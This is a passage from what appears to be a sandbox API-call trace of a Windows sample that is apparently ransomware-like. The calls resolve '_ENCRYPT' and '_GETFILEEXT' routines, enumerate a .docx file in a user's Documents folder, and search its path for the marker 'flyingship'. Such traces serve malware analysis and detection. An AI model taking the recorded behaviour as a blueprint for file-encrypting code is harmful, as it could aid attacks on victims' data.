Size=0x10) returned 0x9bd9d8 [0177.350] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0177.350] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0177.351] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0177.351] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0177.351] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0177.351] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0177.351] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0177.351] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0177.351] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0177.351] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0177.351] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0177.351] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0177.351] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0177.351] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ad98 [0177.351] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0177.351] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8a8 [0177.351] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0177.351] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0177.351] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0177.351] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0177.351] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0177.351] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0177.351] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0177.351] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0177.351] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0177.351] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0177.352] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0177.352] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0177.352] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0177.352] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0177.352] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0177.352] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0177.352] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0177.352] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0177.352] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0177.352] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0177.352] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0177.352] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0177.352] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0177.352] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0177.352] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0177.352] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0177.352] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0177.352] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0177.352] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0177.352] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0177.352] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0177.352] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0177.352] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0177.352] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0177.353] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0177.353] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0177.353] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0177.353] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0177.353] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0177.353] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0177.353] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0177.353] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0177.353] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0177.353] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0177.353] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0177.353] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0177.353] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd5d0 [0177.353] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9bd5d0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0177.353] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0177.353] GetProcAddress (hModule=0x75990000, lpProcName="CloseHandle") returned 0x759a1410 [0177.353] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0177.354] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0177.354] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0177.354] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0177.354] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0177.354] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0177.354] CloseHandle (hObject=0x120) returned 1 [0177.354] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0177.354] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0177.354] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0177.354] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0177.354] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0177.354] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0177.354] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0177.354] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0177.354] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0177.354] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0177.354] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0177.354] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0177.354] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0177.354] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0177.354] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0177.354] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0177.355] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0177.355] FreeLibrary (hLibModule=0x75990000) returned 1 [0177.355] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0177.355] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0177.355] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0177.355] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0177.355] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0177.355] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0177.355] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0177.355] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0177.355] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0177.355] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0177.355] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0177.355] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0177.355] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0177.355] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0177.355] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0177.355] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0177.355] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0177.355] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0177.355] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0177.355] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0177.355] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0177.356] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0177.356] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1930 [0177.356] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0177.356] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0177.356] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0177.356] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0177.356] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0177.356] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0177.356] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0177.356] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0177.356] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0177.356] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0177.356] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0177.356] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0177.356] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0177.356] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0177.356] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0177.356] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ocx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0177.356] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="docx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0177.356] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".docx", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0177.356] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0177.356] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0177.356] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0177.356] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0177.357] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0177.357] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0177.357] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0177.357] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x90) returned 0x8edfa0 [0177.357] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0177.357] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0177.357] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0177.357] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0177.357] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0177.357] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de830 [0177.357] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0177.357] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\8KAz.docx", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6abb3490, ftCreationTime.dwHighDateTime=0x1d5df7c, ftLastAccessTime.dwLowDateTime=0xc074c380, ftLastAccessTime.dwHighDateTime=0x1d5de08, ftLastWriteTime.dwLowDateTime=0xc074c380, ftLastWriteTime.dwHighDateTime=0x1d5de08, nFileSizeHigh=0x0, nFileSizeLow=0xd070, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="8KAz.docx", cAlternateFileName="8KAZ~1.DOC")) returned 0x90add8 [0177.359] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0177.359] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0177.359] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\8KAz.docx", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6abb3490, ftCreationTime.dwHighDateTime=0x1d5df7c, ftLastAccessTime.dwLowDateTime=0xc074c380, ftLastAccessTime.dwHighDateTime=0x1d5de08, ftLastWriteTime.dwLowDateTime=0xc074c380, ftLastWriteTime.dwHighDateTime=0x1d5de08, nFileSizeHigh=0x0, nFileSizeLow=0xd070, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="8KAz.docx", cAlternateFileName="8KAZ~1.DOC")) returned 0x90add8 [0177.359] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0177.359] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0177.360] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\8KAz.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0177.360] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\8KAz.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0177.360] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\8KAz.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0177.360] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\8KAz.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0177.360] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\8KAz.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.360] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\8KAz.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.360] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\8KAz.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0177.360] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\8KAz.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.360] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\8KAz.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.360] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\8KAz.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0177.360] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\8KAz.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0177.360] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\8KAz.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.360] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\8KAz.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0177.360] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\8KAz.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.360] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\8KAz.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.360] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\8KAz.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.360] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\8KAz.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.360] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\8KAz.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.360] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\8KAz.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0177.360] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\8KAz.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.360] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\8KAz.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.360] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\8KAz.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0177.361] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\8KAz.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.361] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Documents\\x6khSA9uDUZMBxf\\8KAz.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0177.361] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Documents\\x6khSA9uDUZMBxf\\8KAz.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.361] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Documents\\x6khSA9uDUZMBxf\\8KAz.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.361] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Documents\\x6khSA9uDUZMBxf\\8KAz.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.361] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Documents\\x6khSA9uDUZMBxf\\8KAz.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0177.361] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Documents\\x6khSA9uDUZMBxf\\8KAz.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.361] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Documents\\x6khSA9uDUZMBxf\\8KAz.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.361] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Documents\\x6khSA9uDUZMBxf\\8KAz.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0177.361] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Documents\\x6khSA9uDUZMBxf\\8KAz.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0177.361] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ocuments\\x6khSA9uDUZMBxf\\8KAz.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.361] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cuments\\x6khSA9uDUZMBxf\\8KAz.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0177.361] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uments\\x6khSA9uDUZMBxf\\8KAz.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.361] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ments\\x6khSA9uDUZMBxf\\8KAz.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.361] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ents\\x6khSA9uDUZMBxf\\8KAz.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0177.361] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nts\\x6khSA9uDUZMBxf\\8KAz.docx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0177.361] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ts\\x6khSA9uDUZMBxf\\8KAz.docx\"", cchCount1=10, lpString2="flyingship", 